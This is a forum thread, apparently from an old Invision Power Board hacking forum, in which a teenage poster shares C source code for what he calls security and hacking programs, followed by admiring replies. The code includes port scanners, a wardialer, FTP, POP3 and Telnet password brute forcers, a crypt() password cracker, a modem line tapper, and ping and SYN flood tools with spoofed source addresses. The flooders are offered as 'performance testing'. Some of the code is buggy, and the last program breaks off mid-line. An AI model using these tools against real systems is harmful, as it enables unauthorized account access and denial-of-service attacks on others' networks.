Here I am posting most of the security auditing and hacking programs I've ever written, big and small. I wrote them all for Linux, but most of them you can edit to get them working without too much trouble on other platforms.
ALL of them are open source, I hope you find some use for them...
-=Rootscan=- Stealth port scanner.
Full Version: Security Programs.
| CODE |
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #include <linux/ip.h> #include <linux/tcp.h> #include <sys/socket.h> #include <sys/types.h> #include <pthread.h> struct timeval timeout; #define MAX 1000 #define GREEN "" #define RED "" #define BLUE "" #define TCP_SCAN 1 #define UDP_SCAN 2 #define SYN_SCAN 3 #define NO 0 #define YES 1 /* End of includes and defines */ /* Defining global variables, arrays and functions */ FILE *fp; char file_to_open[60]; int count = 0; int n_threads = 0; int start_port = 1; int end_port = 65535; int parallel = NO; int verbose = NO; int timeout_sec; char *host_addr; struct pseudohdr { unsigned long saddr; unsigned long daddr; char zer0; unsigned char protocol; unsigned short length; }; /* Set prototypes: */ void usage(char progname[]); void tcp_scan(); void udp(); void syn(); void *try_udp_port (void *); void *try_tcp_port(void *); void *try_syn_port(void *); unsigned short in_cksum(unsigned short *addr,int len); /* End of function prototypes */ /* OpenFiles() function, opens scanresults.txt. */ void OpenFiles() { fp = fopen("rootscan.log", "w" ); if( fp == NULL ) { printf(RED "File Open Error\n"); exit(1); } fprintf(fp,"Rootscan was written by shaunige@yahoo.co.uk" ); fprintf(fp,"\nPorted to windows by : Eckz - mrx@netlane.com - http://eckz.cjb.net\n" ); fprintf(fp,"\nOptions added by : InvisibleGhost : i_t_rules@hotmail.com\n" ); fprintf(fp, "Testers/Bug Testers: Threadhead and Odins_Son\n"); fprintf(fp,"\n******************************************************************" ); fprintf(fp,"\n ROOTSCAN LOG "); fprintf(fp,"\n******************************************************************\n" ); } /* End of OpenFiles() function */ /* CloseFiles() function, closes files */ void CloseFiles() { fclose( fp ); } /* End of global variables, arrays and functions */ /* Main function */ int main(int argc, char *argv[]) { char ch; int scan_type; /* Check args, and print a message if wrong */ if(argc < 2) { usage(argv[0]); exit(-1); } /*Set host address*/ host_addr = argv[1]; /* Check command line arguments, and set variables appropriately */ optarg = NULL; timeout_sec = 3; while ((ch = getopt(argc, argv, "sutpvhb:e:c:")) != -1) switch (ch) { case 's': scan_type = SYN_SCAN; break; case 'u': scan_type = UDP_SCAN; break; case 't': scan_type = TCP_SCAN; break; case 'b': start_port = atoi(optarg); break; case 'e': end_port = atoi(optarg); break; case 'p': parallel = YES; break; case 'c': timeout_sec = atoi(optarg); break; case 'v': verbose = YES; break; case 'h': usage(argv[0]); break; default: break; } if (verbose == YES) printf("Scanning host: %s\n", host_addr); if (verbose == YES && parallel == YES) printf("Going into parallel mode.\n"); switch (scan_type) { case TCP_SCAN: tcp_scan(); break; case UDP_SCAN: udp(); break; case SYN_SCAN: syn(); break; default: tcp_scan(); break; } } /* End of main() */ /* UDP scanning function: * This function was a quick hack, and will probably need some editing to work. */ void udp() { if (verbose == YES) printf("Beginning udp scan from: %d to: %d\n", start_port, end_port); if((gethostbyname(host_addr)) == NULL) { printf(RED "Couldn't resolve %s\n", host_addr); exit(-1); } OpenFiles(); for(count = start_port; count <= end_port; count++) { if (parallel == YES) { pthread_t thread_t; pthread_detach(thread_t); n_threads++; if (pthread_create(&thread_t, NULL, try_udp_port, (void *)count)) { count--; n_threads--; } } else { try_udp_port((void *)count); } if (verbose == YES) printf("\rPort: %d\r", count); } CloseFiles(); } void tcp_scan() { if (verbose == YES) printf("Beginning tcp connect() scan from: %d to: %d\n", start_port, end_port); if((gethostbyname(host_addr)) == NULL) { printf(RED "Couldn't resolve %s\n", host_addr); exit(-1); } printf(BLUE "\t\tPort\t\tState\t\tService\n\n"); /* Start for loop to connect to each port */ OpenFiles(); timeout.tv_sec = timeout_sec; timeout.tv_usec = timeout_sec; for(count = start_port; count <= end_port; count++) { if (parallel == YES) { pthread_t thread_t; pthread_detach(thread_t); n_threads++; if (pthread_create(&thread_t, NULL, try_tcp_port, (void *)count)) { count--; n_threads--; } } else { try_tcp_port((void *)count); } }/* End the for loop */ printf(BLUE "\n\nScan complete!\n\n"); /* Close the file */ CloseFiles(); } /* End function */ void syn() { if (verbose == YES) printf("Beginning syn stealth scan from: %d to: %d\n", start_port, end_port); if((gethostbyname(host_addr)) == NULL) { printf(RED "Couldn't resolve %s!\n", host_addr); exit(-1); } OpenFiles(); printf(BLUE "\t\tPort\t\tState\t\tService\n\n"); for(count = start_port; count <= end_port; count++) { if (parallel == YES) { pthread_t thread_t; pthread_detach(thread_t); n_threads++; if (pthread_create(&thread_t, NULL, try_syn_port, (void *)count)) { count--; n_threads--; } } else { try_syn_port((void *)count); } } /* End for() */ } /* End function */ void *try_udp_port(void *tmp) { int port = (int)(tmp); int sock; struct hostent *udp_host; struct sockaddr_in udp_dest; char udp_data[] = "hello\0"; int udp_len = strlen(udp_data); char udp_buf[20]; int sin_len = sizeof(struct sockaddr); if((udp_host = gethostbyname(host_addr)) == NULL) { printf(RED "Couldn't resolve %s\n", host_addr); exit(-1); } /* Create a SOCK_DGRAM socket instead, SOCK_DGRAM is UDP socket */ if((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { printf(RED "Couldn't create datagram socket!\n"); exit(-1); } /* Fill in address structs. */ udp_dest.sin_family = AF_INET; udp_dest.sin_port = htons(port); udp_dest.sin_addr = *((struct in_addr *)udp_host->h_addr); /* Send the datagram. */ sendto(sock, udp_data, udp_len, 0, (struct sockaddr *)&udp_host, sizeof(struct sockaddr)); /* If we get a reply, the port is probably closed. */ if(recvfrom(sock, udp_buf, 19, 0, (struct sockaddr *)&udp_host, &sin_len) < 0) { close(sock); fprintf(fp, "Port %d \t Closed\n", count); } /* If we received no response, the port is probably open. */ else { printf(RED "Port %d \t Open\n", count); close(sock); fprintf(fp, "Port %d \t Open\n", count); } close(sock); } void *try_tcp_port (void *tmp) { int port = (int)(tmp); int sock = 0; char http; char httpsend[18] = "HEAD / HTTP/1.0\n\n"; char httpbuf[MAX]; struct hostent *tcp_host; struct sockaddr_in tcp_dest; struct servent *serv; if (verbose == YES) printf("Port: %d\r", port); if((tcp_host = gethostbyname(host_addr)) == NULL) { printf(RED "Couldn't resolve %s\n", host_addr); exit(-1); } /* Creating the socket, with the integer variable called sock, checking if it suceeded, socket() returns -1 on error */ if((sock = socket(AF_INET, SOCK_STREAM, 0)) == 0) { printf(RED "Couldn't make socket!\n"); exit(-1); } setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (const char*)&timeout, sizeof(timeout)); setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (const char*)&timeout, sizeof(timeout)); /* Setting up the sockaddr_in struct with connection details, port, 'family', hostname/IP address */ tcp_dest.sin_family = AF_INET; tcp_dest.sin_port = htons(port); tcp_dest.sin_addr = *((struct in_addr *)tcp_host->h_addr); /* Connecting the sock to the host on the port the for loop is up to */ if (connect(sock , (struct sockaddr *)&tcp_dest, sizeof(struct sockaddr)) == -1) { fprintf( fp ,"Port %5d Closed\n", port); close(sock); } else { /* Get the service name the port is likely to be. */ serv = getservbyport(htons(port), "tcp"); printf(RED "\t\t%d \t\t Open \t\t %s\n", port, (serv == NULL) ? "UNKNOWN" : serv->s_name); fprintf( fp ,"Port %5d Open \t %s\n", port, (serv == NULL) ? "UNKNOWN" : serv->s_name); /* If the variable the for loop is using equals 80, they might be running a web server, get the version? */ if(port == 80) { printf(GREEN "\n\nThe host is running a HTTP server, get HTTPD version? [y/n]"); scanf("%c", &http); if(http == 'y') { fprintf(fp,"\nHTTP version response:\n"); /* Sending HEAD / HTTP/1.0\n\n to get the version. */ send(sock, httpsend, strlen(httpsend), 0); /* Receiving the result, store it in httpbuf */ recv(sock, httpbuf, MAX-1, 0); /* Print it to stdout (monitor) */ printf("%s", httpbuf); /* Print it to the file */ fprintf(fp, "%s", httpbuf); } } /* Close the socket */ close(sock); } } void *try_syn_port(void *tmp) { int port = (int)(tmp); int sock; struct hostent *h = gethostbyname(host_addr); /* the variables */ int on=1; int ssize = sizeof(struct sockaddr_in); int packet_size = (sizeof(struct tcphdr)+sizeof(struct iphdr)); char *packet = malloc(packet_size); char *received = malloc(packet_size); /* The headers */ struct tcphdr *tcph = (struct tcphdr *)(packet+sizeof(struct iphdr)); struct pseudohdr *pseudo = (struct pseudohdr *)(packet+sizeof(struct iphdr)+sizeof(struct tcphdr)); struct iphdr *iph = (struct iphdr *)(packet); struct tcphdr *tcphr; struct iphdr *iphr; struct sockaddr_in local; struct sockaddr_in remote; struct in_addr saddr, daddr; struct servent *serv; /* making socket, and telling kernel we fill in the ip header */ if( (sock = socket( PF_INET, SOCK_RAW, IPPROTO_TCP)) < 0 ) { perror("socket"); exit(1); } if( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ) { perror("setsockopt"); exit(1); } daddr = *((struct in_addr *)h->h_addr); saddr.s_addr = inet_addr("62.254.68.38"); /* Change the IP address here. */ /***********************/ /* The pseudo header for the checksum */ pseudo->saddr = saddr.s_addr; pseudo->daddr = daddr.s_addr; pseudo->protocol = IPPROTO_TCP; pseudo->zer0 = 0; pseudo->length = htons(sizeof(struct tcphdr)); bzero( packet, packet_size ); tcph->source = htons(8901); tcph->dest = htons(port); tcph->seq = htonl(random()%time(NULL)); tcph->ack_seq= htonl(random()%time(NULL)); tcph->doff = 5; tcph->res1 = 0; tcph->fin = 0; tcph->syn = 1; tcph->rst = 0; tcph->psh = 0; tcph->ack = 0; tcph->urg = 0; tcph->window = htons(12000); tcph->check = (unsigned short)in_cksum((unsigned short *)tcph, sizeof(struct tcphdr)+sizeof(struct pseudohdr)); bzero(packet, sizeof(struct iphdr)); iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = htons(packet_size); iph->frag_off = 0; iph->ttl = IPDEFTTL; iph->protocol = IPPROTO_TCP; iph->check = (unsigned short)in_cksum((unsigned short *)iph, sizeof(struct iphdr)); iph->saddr = saddr.s_addr; iph->daddr = daddr.s_addr; remote.sin_family = PF_INET; remote.sin_addr = daddr; remote.sin_port = htons(port); if( (sendto(sock, packet, packet_size, 0x0, (struct sockaddr *)&remote, sizeof(remote))) < 0 ) { perror("sendto"); exit(1); } bzero( packet, packet_size ); if( (recvfrom(sock, received, packet_size, 0x0, (struct sockaddr *)&local, &ssize )) < 0 ) { perror("recvfrom"); exit(1); } iphr = (struct iphdr *)(received); tcphr = (struct tcphdr *)(received+(int)((iphr->ihl)*4)); /* using fixed sizes can be tricky, so i dont;) */ if( tcphr->syn == 1 && tcphr->ack == 1 ) /* SYN/ACK */ { serv = getservbyport(htons(port), "tcp"); printf("\t\t%d \t\t Open \t\t %s\n", ntohs(tcphr->source), (serv == NULL) ? "UNKNOWN" : serv->s_name); } else if( tcphr->rst = 1 ) /* RST */ { printf(""); /* anyone a suggestion what could be done here ? */ } else /* This shouldnt happen */ { printf("Protocol violation :P\n"); exit(-2); } close(sock); } /* The checksum function from the raw ip faq */ unsigned short in_cksum(unsigned short *addr,int len) { register int sum = 0; u_short answer = 0; register u_short *w = addr; register int nleft = len; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } void usage(char *progname) { printf(RED "Usage: %s <host/ip> [-tsu] [-p] [-b number] [-e number] [-c number] [-v]\n", progname); printf(RED "\n\nRootscan was written by shaunige@yahoo.co.uk,\nEckz - mrx@netlane.com - http://freewebs.com/bh_x,\n"); printf(RED "InvisibleGhost : i_t_rules@hotmail.com,\nand Ozzy.\nBug testers: Threadhead and Odins_Son, p4n_n0s.\n"); printf(RED "\n\t-u : Scan for UDP Ports\n"); printf(RED "\tUDP scanning option is currently experimental.\n"); printf(RED "\t-s : Scan using SYN scanning (stealthy).\n"); printf(RED "\t-t : Scan using TCP connect() scanning (default).\n"); printf(RED "\t-p : Scan in parallel mode, using threads (faster in some cases)\n"); printf(RED "\t-b number: start scanning at port number. (default = 1)\n"); printf(RED "\t-e number: stop scanning at port number. (default = 65535)\n"); printf(RED "\t-c number: Set connect() timeout (default = 3, \n\tcurrently only affects tcp connect() scan.)\n"); printf(RED "\t-v: Be verbose (mostly for debugging or checking speed)\n\n"); exit(-1); } /* End function */ |
-=Rootdial=- Minimalistic wardialer.
| CODE |
#include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> /* May need to change this */ #define MODEM_PORT "/dev/modem" #define GREEN "\E[32m" #define RED "\E[31m" #define BLUE "\E[34m" int main() { int snum; int endnum; unsigned int i; int modemfd; char con_buf[15]; system("clear"); printf(BLUE "--------------------------------------------------------------------------------\n"); printf(RED "\t\tRootdial v3.1 was written by shaunige@yahoo.co.uk\n"); printf(BLUE "--------------------------------------------------------------------------------\n\n"); printf(BLUE "Enter start number: "); scanf("%d", &snum); printf(BLUE "Enter end number: "); scanf("%d", &endnum); if((modemfd = open(MODEM_PORT, O_RDWR | O_NOCTTY | O_NDELAY)) == NULL) { printf(RED "Couldn't open modem\n"); exit(-1); } for(i = snum; i <= endnum; i++) { char num_buf[20]; sprintf(num_buf, "ATDT%d\r", i); write(modemfd, "ATZ\r", 4); write(modemfd, num_buf, 17); printf(BLUE "\n\nDialing %d...\n", i); printf(BLUE "Checking for carrier...\n"); sleep(25); read(modemfd, con_buf, 14); read(modemfd, con_buf, 14); if(strstr(con_buf, "ONNECT") != NULL) { printf(GREEN "*** CONNECT ***\nCarrier found on %d!\n", i); write(modemfd, "+++ATH0\r", 8); } else { write(modemfd, "+++ATH0\r", 8); printf(RED "Carrier not found on %d\n", i); } } printf(BLUE "\nScan complete.\n"); return(0); } |
-=TinyScan=- Minimalistic port scanner, little brother of rootscan.
| CODE |
#include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> int main(int argc, char *argv[]) { if(argc < 4) { system("clear"); printf("Usage: %s <host/ip address> <start_port> <end_port>\n", argv[0]); printf("TinyScan was written by shaunige@yahoo.co.uk\n"); exit(-1); } int sock; int count; struct sockaddr_in dest; struct hostent *he; if((he = gethostbyname(argv[1])) == NULL) { printf("Couldn't resolve %s\n", argv[1]); exit(-1); } for(count = atoi(argv[2]); count <= atoi(argv[3]); count++) { if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Couldn't create socket!\n"); exit(-1); } dest.sin_family = AF_INET; dest.sin_port = htons(count); dest.sin_addr = *((struct in_addr *)he->h_addr); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) { close(sock); } else { printf("Port %d\tOpen\n", count); close(sock); } } printf("Scan complete.\n"); return(0); } |
-=FTPBrute=- Quick FTP brute forcer.
| CODE |
#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> int main() { int sock; char pass[15]; char get_buf[1024]; char pass_buf[30]; char user_buf[25]; char plist[15]; char dhost[20]; char victim[10]; char msg[3] = "331"; struct sockaddr_in dest; struct hostent *host; FILE *pwdlist; system("clear"); printf("FTPBrute, FTP Brute forcer - shaunige@yahoo.co.uk\n\n"); printf("Host: "); scanf("%s", dhost); printf("Login to brute force: "); scanf("%s", victim); printf("Dictionary File: "); scanf("%s", plist); if((host = gethostbyname(dhost)) == NULL) { printf("Couldn't resolve %s\n!", dhost); exit(-1); } if((pwdlist = fopen(plist, "r")) == NULL) { printf("Couldn't open file: %s!\n", plist); exit(-1); } sprintf(user_buf, "USER %s\n", victim); while(!feof(pwdlist)) { fscanf(pwdlist, "%s", pass); sprintf(pass_buf, "PASS %s\n", pass); if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Couldn't make socket!\n"); exit(-1); } dest.sin_family = AF_INET; dest.sin_port = htons(21); dest.sin_addr = *((struct in_addr *)host->h_addr); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) { printf("Couldn't connect to %s on port 21!\n", dhost); exit(-1); } printf("Trying: %s\n", pass); recv(sock, get_buf, sizeof(get_buf), 0); send(sock, user_buf, sizeof(user_buf), 0); recv(sock, get_buf, sizeof(get_buf), 0); send(sock, pass_buf, sizeof(pass_buf), 0); recv(sock, get_buf, sizeof(get_buf), 0); if(strstr(get_buf, "230") != NULL) { printf("\nThe password is: %s.\n", pass); return(0); close(sock); } close(sock); } fclose(pwdlist); printf("Couldn't brute force password.\n"); return(0); } |
-=POP3 Brute=- POP3 protocol brute forcer.
| CODE |
#include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> int main() { int sock; char dhost[20]; char login[15]; char dict[15]; char wordbuf[15]; char userbuf[25]; char passbuf[25]; char recvbuf[1024]; FILE *wordlist; struct sockaddr_in dest; struct hostent *host; printf("Pop3 Brute, POP3 Brute forcer - By shaunige@yahoo.co.uk\n\n"); printf("Host: "); scanf("%s", dhost); printf("Login: "); scanf("%s", login); printf("Wordlist: "); scanf("%s", dict); if((host = gethostbyname(dhost)) == NULL) { printf("Couldn't resolve %s!\n", dhost); exit(-1); } if((wordlist = fopen(dict, "rw")) == NULL) { printf("Couldn't open %s!\n", dict); exit(-1); } sprintf(userbuf, "USER %s\n", login); if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Couldn't make socket!\n"); exit(-1); } dest.sin_family = AF_INET; dest.sin_port = htons(110); dest.sin_addr = *((struct in_addr *)host->h_addr); /* We only connect once, because POP3 never disconnects you after * bad password attempts */ if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) { printf("Couldn't connect to %s on port 110!\n", dhost); exit(-1); } sleep(2); recv(sock, recvbuf, strlen(recvbuf), 0); while(!feof(wordlist)) { fscanf(wordlist, "%s", wordbuf); sprintf(passbuf, "PASS %s\n", wordbuf); printf("Trying: %s\n", wordbuf); send(sock, userbuf, strlen(userbuf), 0); recv(sock, recvbuf, strlen(recvbuf), 0); send(sock, passbuf, strlen(passbuf), 0); recv(sock, recvbuf, strlen(recvbuf), 0); if(strstr(recvbuf, "-ERR") != NULL) { printf("Password is: %s\n", wordbuf); return(0); } } close(sock); fclose(wordlist); printf("Password not found!\n"); return(0); } |
-=TelnetBrute=- Quick zyxtel router telnetd brute forcer.
| CODE |
#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> int main() { int sock; FILE *pwdlist; char getbuf[50]; char pwdbuf[20]; char dhost[20]; char dict[20]; char login[10]; char nl[2] = "\n"; char prompt[1] = "$"; /* Change this to "#" if you are cracking root. */ struct sockaddr_in dest; struct hostent *host; system("clear"); printf("Brute 1.0, Telnet brute forcer - shaunige@yahoo.co.uk\n\n"); printf("Host: "); scanf("%s", dhost); printf("Login to brute force: "); scanf("%s", login); printf("Dictionary File: "); scanf("%s", dict); if((host = gethostbyname(dhost)) == NULL) { printf("Couldn't resolve %s!\n", dhost); exit(-1); } if((pwdlist = fopen(dict, "r")) == NULL) { printf("Couldn't find %s!\n", dict); exit(-1); } while(!feof(pwdlist)) { if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Couldn't make socket!\n"); exit(-1); } dest.sin_family = AF_INET; dest.sin_port = htons(23); dest.sin_addr = *((struct in_addr *)host->h_addr); fscanf(pwdlist, "%s", pwdbuf); printf("Trying: %s.\n", pwdbuf); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) { printf("Couldn't connect to %s on port 23!\n", dhost); exit(-1); } /* I didn't bother checking for a login or password prompt here.*/ send(sock, login, sizeof(pwdbuf), 0); recv(sock, getbuf, sizeof(getbuf), 0); sleep(1); send(sock, pwdbuf, sizeof(pwdbuf), 0); recv(sock, getbuf, sizeof(getbuf), 0); if(strstr(getbuf, prompt) != NULL) { printf("Password is: %s!\n", pwdbuf); fclose(pwdlist); close(sock); return(0); } close(sock); } printf("Password not found!\n"); fclose(pwdlist); return(0); } |
-=RootCrack=- Minimalistic UNIX password cracker.
| CODE |
/* Compile: gcc rootcrack.c -o rootcrack -lcrypt * Usage: ./rootcrack wordlist.txt, then enter the encrypted password string. */ #include <crypt.h> #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { if(argc < 2) { system("clear"); printf("Usage: rootcrack <wordlist>\n"); printf("Rootcrack was written by shaunige@yahoo.co.uk\n"); exit(-1); } FILE *wordlist; char salt[3]; char pwd[25]; char wordbuf[10]; char *encrypt; printf("Enter encrypted password: "); // Get the encrypted password. scanf("%s", pwd); if((wordlist = fopen(argv[1], "rw")) == NULL) { // Open the wordlist. printf("Couldn't find wordlist!\n"); exit(-1); } /* Run through each word in the wordlist, encrypting, and then comparing * it to the encrypted password string. */ while(!feof(wordlist)) { fscanf(wordlist, "%s", wordbuf); salt[0] = pwd[0]; salt[1] = pwd[1]; salt[2] = '\0'; encrypt = (char *) crypt(wordbuf, salt); /* Check to see if the strings match */ if(strcmp(pwd, encrypt) == 0) { /* We've cracked the password! */ printf("Password is: %s\n", wordbuf); printf("Salt: %s\n", salt); return(0); } } printf("Password not found!\n"); return(0); } |
-=RootCrypt-= Simple little XOR encryptor.
| CODE |
#include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { if(argc < 3) { printf("Usage: %s <infile> <outfile>\n", argv[0]); printf("Rootcrypt was written by shaunige@yahoo.co.uk\n"); exit(-1); } int c; FILE *in; FILE *out; if((in = fopen(argv[1], "rw")) == NULL) { printf("Couldn't find file %s!\n", argv[1]); exit(-1); } if((out = fopen(argv[2], "w")) == NULL) { printf("Couldn't create file!\n"); exit(-1); } while((c = getc(in)) != EOF) { c = c + 10 ^ 65 * 3; putc(c, out); } fclose(in); fclose(out); printf("File encrypted!\n"); return(0); } |
-=RootTap=- Simple phone tapper. Taps line that modem is connected to.
| CODE |
#include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> /* May need to change this */ #define MODEM_PORT "/dev/modem" int main() { int modemfd; char modembuf[15]; system("clear"); printf("Roottap was written by shaunige@yahoo.co.uk\n"); printf("Roottap will tap the phone line your modem is connected to\n\n"); if((modemfd = open(MODEM_PORT, O_RDWR | O_NOCTTY | O_NDELAY)) == NULL) { printf("Couldn't open modem\n"); exit(-1); } printf("Turning modem speaker on...\n"); sprintf(modembuf, "ATM3\r"); sleep(1); write(modemfd, modembuf, 5); printf("Taking the modem off the hook\n"); sprintf(modembuf, "ATH1\r"); sleep(1); write(modemfd, modembuf, 5); printf("Phone line tapped!\n"); sleep(50); } |
-=PingFlood=- Simple ping flooder for performance testing of systems, network devices, routers etc...
| CODE |
#include <stdio.h> #include <stdlib.h> #include <netinet/in.h> #include <netdb.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s <host>\n", argv[0]); exit(0); } int sock; char packet[5000]; char r[5000]; struct sockaddr_in dest; struct hostent *host; struct iphdr *ip = (struct iphdr *) packet; struct icmphdr *icmp = (struct icmp *) packet + sizeof(struct iphdr); if((host = gethostbyname(argv[1])) == NULL) { printf("Couldn't resolve host!\n"); exit(-1); } if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) { printf("Couldn't make socket!\n"); printf("You must be root to create a raw socket.\n"); exit(-1); } dest.sin_family = AF_INET; dest.sin_addr = *((struct in_addr *)host->h_addr); ip->ihl = 5; ip->id = htons(1337); ip->ttl = 255; ip->tos = 0; ip->protocol = IPPROTO_ICMP; ip->version = 4; ip->frag_off = 0; ip->saddr = htons("1.3.3.7"); ip->daddr = inet_ntoa(dest.sin_addr); ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr); ip->check = 0; icmp->checksum = 0; icmp->type = ICMP_ECHO; icmp->code = 0; printf("Ping flooding %s!\n", argv[1]); fork(); fork(); while(1) { sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr)); } return(0); } |
-=SynFlood=- Useful for performance testing. Packet loss may occur, due to missing checksum.
| CODE |
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netdb.h> int main(int argc, char *argv[]) { if(argc < 3) { printf("Usage: %s <host> <port>\n", argv[0]); printf("Synflooder v1.7 was written by shaunige@yahoo.co.uk\n"); exit(-1); } int sock; char packet[4096]; /* Datagram. */ struct sockaddr_in dest; struct iphdr *ip = (struct iphdr *) packet; struct tcphdr *tcp = (struct tcphdr *) packet + sizeof(struct iphdr); struct hostent *he; if((he = gethostbyname(argv[1])) == NULL) { printf("Couldn't resolve hostname!\n"); exit(-1); } if((sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) { printf("Socket failed!\n"); printf("Must be root to make raw socket.\n"); exit(-1); } dest.sin_family = AF_INET; dest.sin_port = htons(atoi(argv[2])); dest.sin_addr = *((struct in_addr *)he->h_addr); memset(packet, 0, 4096); // Zero out packet. // Fill in IP headers. ip->ihl = 5; ip->version = 4; ip->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr); ip->id = htons(1337); ip->saddr = inet_addr("127.0.0.1"); ip->daddr = inet_ntoa(dest.sin_addr); ip->ttl = 255; ip->protocol = 6; ip->check = 0; ip->tos = 0; ip->frag_off = 0; // Fill in TCP headers. tcp->source = htons(1337); tcp->dest = htons(atoi(argv[2])); tcp->seq = htons(random()); tcp->ack = 0; tcp->syn = 1; tcp->window = htons(65535); tcp->check = 0; tcp->doff = 5; tcp->rst = 0; tcp->psh = 0; tcp->fin = 0; tcp->urg = 0; tcp->ack_seq = htons(0); printf("Syn flooding: %s!\n", argv[1]); /* Insert some more fork()'s in here, if you want. */ fork(); fork(); while(1) { sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr)); } return(0); } |
-=PNuke=- A simple program, similiar to Octopus.c in function. A process table saturation attack, if you want to test network performance.
| CODE | ||||||
#include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> #define MAX_CON 1025 /* You may have to change this, depending on your OS */ int main(int argc, char *argv[]) { if(argc < 3) { printf("Usage: %s <host
wow...out of this world....
thats an excellent start to a new forum by 2 good programmers...i can see this forum taking off good style  it would great to see these programs compiled and running in Windows and how the code was altered to run as an Win app.. just a thought many thanks guys.... 
Hehe, thanks.
There's actually not many things you'd need to change on most. You'd need to alter the header files (the ones with #include at the front), and for the socket programs (network programs) you'd need to add a few lines of code to initialise Winsock. I will post instructions tomorrow, I'm tired, going to bed  .Thank you for your time. Shaun.
Amazing!!!
Excellent stuff Shaun! How long you been coding?
thanks to you shaun2k2 for providing your code for our members to digest
am i glad this forum was created...always wanted my own scanner with a gui and my exploits ....perhaps i might get the chance now
Very good post Shaun. I think i'll be trying some of these out when i finally get the chance to dual boot linux.
Thx.
With this new forum and such great content, i spose i better go digging in my code vault and post some too.
Great job shaunIf i find time tomorrow nite, i will compile these on freebsd and post them in the file downloads and leave the link here. I just have to find time to write a report for my boss on the Local Loop that he let go to shit. Only about 5000 customers lost phone  PS Going from 3mbit to 56kbit BLOWS!!!!!!!!!
Thanks guys.
dillinja, well, I'm 14 now, so I've been coding since I was 12 or 13, but only around a year seriously. The other time I just messed about with code. Yeah, it would be really good if we got a whole bunch of our security/hacking programs together, everyone, post yer code .ComSec, sweet, if you need help I can help with that! My friend wrote a GUI port scanner, I'll get you the code! www.wxwindows.com Thank you for your time. Shaun.
yeah...look forward to it
your joking ! if you are your going places
Thanks.
Cool, I'm going places .-Shaun.
I feel dumb. lol Nice post shaun, that encouraged me to make my MicroScanner 2.0 open source.
I admire you shaun
 I'm a programmer too, but not as experienced it seems, just been playing around with different stuff, made a few chatprogs etc etc. Started with official Microsoft C# courses now too heh.. This encouraged me to pick up the ol' programming books. Hope to see more of your code, as you will see mine when I've done something
Nice code ,man . I'm going to create a thread of the one ( 1 ) useful program i've made
Thanks guys.
-Shaun.
10x thanks for posting
thanx a lot for this tools
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
||||||
Invision Power Board © 2001-2005 Invision Power Services, Inc.
